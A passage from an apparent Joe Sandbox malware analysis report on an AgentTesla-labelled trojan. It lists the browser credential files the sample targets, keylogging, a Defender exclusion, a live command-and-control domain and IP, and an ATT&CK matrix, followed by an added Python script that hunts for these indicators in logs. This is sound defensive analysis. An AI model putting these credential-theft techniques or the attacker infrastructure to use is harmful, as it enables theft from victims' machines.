            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeQueries volume information: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040A0B0 GetLocalTime,wsprintfW,14_2_0040A0B0
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004195F8 GetUserNameW,14_2_004195F8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,14_2_004466BF
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 8184, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data14_2_0040A953
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\14_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: \key3.db14_2_0040AA71

            Remote Access Functionality

            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 8184, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: cmd.exe14_2_0040567A
            MITRE ATT&CK Matrix (numbers in parentheses are the signature counts shown against each technique)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (11) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Ingress Tool Transfer (12) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
            Credentials | Domains | Default Accounts | Command and Scripting Interpreter (1) | Windows Service (1) | Access Token Manipulation (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (211) | Account Discovery (1) | Remote Desktop Protocol | Input Capture (211) | Encrypted Channel (2) | Exfiltration Over Bluetooth | Defacement (1)
            Email Addresses | DNS Server | Domain Accounts | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Windows Service (1) | Obfuscated Files or Information (4) | Credentials In Files (2) | System Service Discovery (1) | SMB/Windows Admin Shares | Clipboard Data (3) | Non-Standard Port (1) | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Service Execution (2) | Login Hook | Process Injection (122) | Software Packing (12) | NTDS | File and Directory Discovery (3) | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol (2) | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Scheduled Task/Job (1) | DLL Side-Loading (1) | LSA Secrets | System Information Discovery (33) | SSH | Keylogging | Application Layer Protocol (12) | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading (1) | Cached Domain Credentials | Security Software Discovery (121) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (31) | DCSync | Virtualization/Sandbox Evasion (31) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (1) | Proc Filesystem | Process Discovery (3) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (122) | /etc/passwd and /etc/shadow | Application Window Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | System Owner/User Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Behavior Graph ID: 1560114 | Sample: Purchase Inquiry_002.exe | Startdate: 21/11/2024 | Architecture: WINDOWS | Score: 100
            Node 2 (start) -> 46 cee.work.gd; 48 geoplugin.net; 54 Suricata IDS alerts for network traffic; 56 Found malware configuration; 58 Malicious sample detected (through community Yara rule); 60 13 other signatures; 8 Purchase Inquiry_002.exe 7 (started); 12 xASiLfzXONGIW.exe 5 (started)
            Node 8 Purchase Inquiry_002.exe -> 38 C:\Users\user\AppData\...\xASiLfzXONGIW.exe, PE32 (dropped); 40 C:\...\xASiLfzXONGIW.exe:Zone.Identifier, ASCII (dropped); 42 C:\Users\user\AppData\Local\...\tmp3EA3.tmp, XML (dropped); 44 C:\Users\...\Purchase Inquiry_002.exe.log, ASCII (dropped); 62 Adds a directory exclusion to Windows Defender; 64 Injects a PE file into a foreign processes; 14 Purchase Inquiry_002.exe 2 16 (started); 18 powershell.exe 23 (started); 20 powershell.exe 21 (started); 22 schtasks.exe 1 (started)
            Node 12 xASiLfzXONGIW.exe -> 66 Multi AV Scanner detection for dropped file; 68 Contains functionalty to change the wallpaper; 70 Machine Learning detection for dropped file; 72 4 other signatures; 24 schtasks.exe 1 (started); 26 xASiLfzXONGIW.exe (started)
            Node 14 Purchase Inquiry_002.exe -> 50 cee.work.gd 154.216.19.141, 2531, 49749 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles; 52 geoplugin.net 178.237.33.50, 49757, 80 ATOM86-ASATOM86NL Netherlands; 74 Installs a global keyboard hook
            Node 18 powershell.exe -> 76 Loading BitLocker PowerShell Module; 28 WmiPrvSE.exe (started); 30 conhost.exe (started)
            Node 20 powershell.exe -> 32 conhost.exe (started)
            Node 22 schtasks.exe -> 34 conhost.exe (started)
            Node 24 schtasks.exe -> 36 conhost.exe (started)

            Source | Detection | Scanner | Label | Link
            Purchase Inquiry_002.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
            Purchase Inquiry_002.exe | 100% | Joe Sandbox ML | |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |

            No Antivirus matches
            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            cee.work.gd | 100% | Avira URL Cloud | malware |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            geoplugin.net | 178.237.33.50 | true | false | | high
            cee.work.gd | 154.216.19.141 | true | true | | unknown
Contacted URLs
Name                         | Malicious | Antivirus Detection      | Reputation
http://geoplugin.net/json.gp | false     |                          | high
cee.work.gd                  | true      | Avira URL Cloud: malware | unknown
URLs from memory and binary data
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp7 | Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp/C | Purchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp; Purchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp; xASiLfzXONGIW.exe, 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp; xASiLfzXONGIW.exe, 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Purchase Inquiry_002.exe, 00000000.00000002.1341190098.00000000028A6000.00000004.00000800.00020000.00000000.sdmp; xASiLfzXONGIW.exe, 0000000A.00000002.1380724904.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resources | Purchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.dr | false | | high
http://geoplugin.net/json.gpSystem32 | Purchase Inquiry_002.exe, 00000009.00000002.3752431492.0000000001564000.00000004.00000020.00020000.00000000.sdmp | false | | high

The trailing characters on the carved strings ("7", "/C", "System32", "Oproject_mgt_system.Properties.Resources") are over-reads by the string extractor; the URLs are http://geoplugin.net/json.gp and http://tempuri.org/project_mgtDataSet.xsd. Two of these sources are informative on their own: the tempuri.org dataset schema and the project_mgt_system.Properties.Resources name show the loader was built as (or from) a .NET WinForms "project management system" application, which matches the framework assemblies in the CLR usage log below; and the last xASiLfzXONGIW.exe source is a region at 0x400000 mapped with protection 0x40 (PAGE_EXECUTE_READWRITE) in the second xASiLfzXONGIW.exe instance, where an injected payload containing the geoplugin URL would live.
Contacted IPs
IP             | Domain        | Country     | ASN    | ASN Name                                                  | Malicious
154.216.19.141 | cee.work.gd   | Seychelles  | 135357 | SKHT-AS Shenzhen Katherine Heng Technology Information Co | true
178.237.33.50  | geoplugin.net | Netherlands | 8455   | ATOM86-AS ATOM86 NL                                       | false
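The domain, URL and IP tables above are the indicators most teams will actually consume from this report, and the one trap in them is geoplugin.net: it is a public geolocation API that many unrelated programs call, so it belongs in a watchlist only as a weak signal. The following is an added example, not code from the report or from Joe Sandbox: a small matcher that takes the report's indicators and runs them over Zeek-style JSON log lines. The log lines are constructed for the example; the indicators, including the remote port 2531, are the report's own.

```python
"""Added example (not part of the Joe Sandbox report): the network indicators
from the tables above as a matcher over Zeek-style JSON log lines. The log
lines are constructed; the indicators are the report's. geoplugin.net is a
public geolocation API, so it is treated as a weak indicator that only
matters when the same host also reaches the listed domain or address."""
import json

# Strong indicators, copied from the report's domain and IP tables.
MALICIOUS_DOMAINS = {"cee.work.gd"}
MALICIOUS_IPS = {"154.216.19.141"}
MALICIOUS_PORTS = {2531}                # remote port of the connection to 154.216.19.141
# Weak indicator: legitimate service the sample queries to geolocate the infected host.
WEAK_DOMAINS = {"geoplugin.net"}


def _domain_listed(name: str, listed: set) -> bool:
    """Exact or subdomain match against a set of domain names."""
    name = name.lower().rstrip(".")
    return name in listed or any(name.endswith("." + d) for d in listed)


def match_record(rec: dict):
    """Classify one log record as ('strong', reason), ('weak', reason) or None."""
    if rec.get("_path") == "dns":
        query = rec.get("query", "")
        if _domain_listed(query, MALICIOUS_DOMAINS):
            return "strong", f"dns query {query}"
        if set(rec.get("answers", [])) & MALICIOUS_IPS:
            return "strong", f"{query} resolved to a listed address"
        if _domain_listed(query, WEAK_DOMAINS):
            return "weak", f"dns query {query}"
    elif rec.get("_path") == "conn":
        dst, port = rec.get("id.resp_h"), rec.get("id.resp_p")
        if dst in MALICIOUS_IPS:
            return "strong", f"connection to {dst}:{port}"
        if port in MALICIOUS_PORTS:
            return "weak", f"connection to {dst}:{port} on a listed port"
    return None


def hunt(log_text: str) -> dict:
    """Hits grouped by source host; hosts with only weak hits are dropped."""
    per_host = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        hit = match_record(rec)
        if hit is None:
            continue
        strength, reason = hit
        per_host.setdefault(rec["id.orig_h"], {"strong": [], "weak": []})[strength].append(reason)
    return {host: hits for host, hits in per_host.items() if hits["strong"]}


# Constructed log lines: 10.0.0.23 reproduces the sandbox's traffic, 10.0.0.77 only
# uses geoplugin.net, 10.0.0.90 is unrelated.
SAMPLE_LOG = """\
{"ts": 1732188107.1, "_path": "dns", "id.orig_h": "10.0.0.23", "query": "cee.work.gd", "answers": ["154.216.19.141"]}
{"ts": 1732188107.4, "_path": "conn", "id.orig_h": "10.0.0.23", "id.resp_h": "154.216.19.141", "id.resp_p": 2531, "proto": "tcp"}
{"ts": 1732188108.0, "_path": "dns", "id.orig_h": "10.0.0.23", "query": "geoplugin.net", "answers": ["178.237.33.50"]}
{"ts": 1732188108.2, "_path": "conn", "id.orig_h": "10.0.0.23", "id.resp_h": "178.237.33.50", "id.resp_p": 80, "proto": "tcp"}
{"ts": 1732188200.0, "_path": "dns", "id.orig_h": "10.0.0.77", "query": "geoplugin.net", "answers": ["178.237.33.50"]}
{"ts": 1732188201.0, "_path": "conn", "id.orig_h": "10.0.0.77", "id.resp_h": "178.237.33.50", "id.resp_p": 80, "proto": "tcp"}
{"ts": 1732188300.0, "_path": "dns", "id.orig_h": "10.0.0.90", "query": "fs.microsoft.com", "answers": ["23.1.2.3"]}
"""

if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_LOG).items():
        print(host, json.dumps(hits, indent=2))
```

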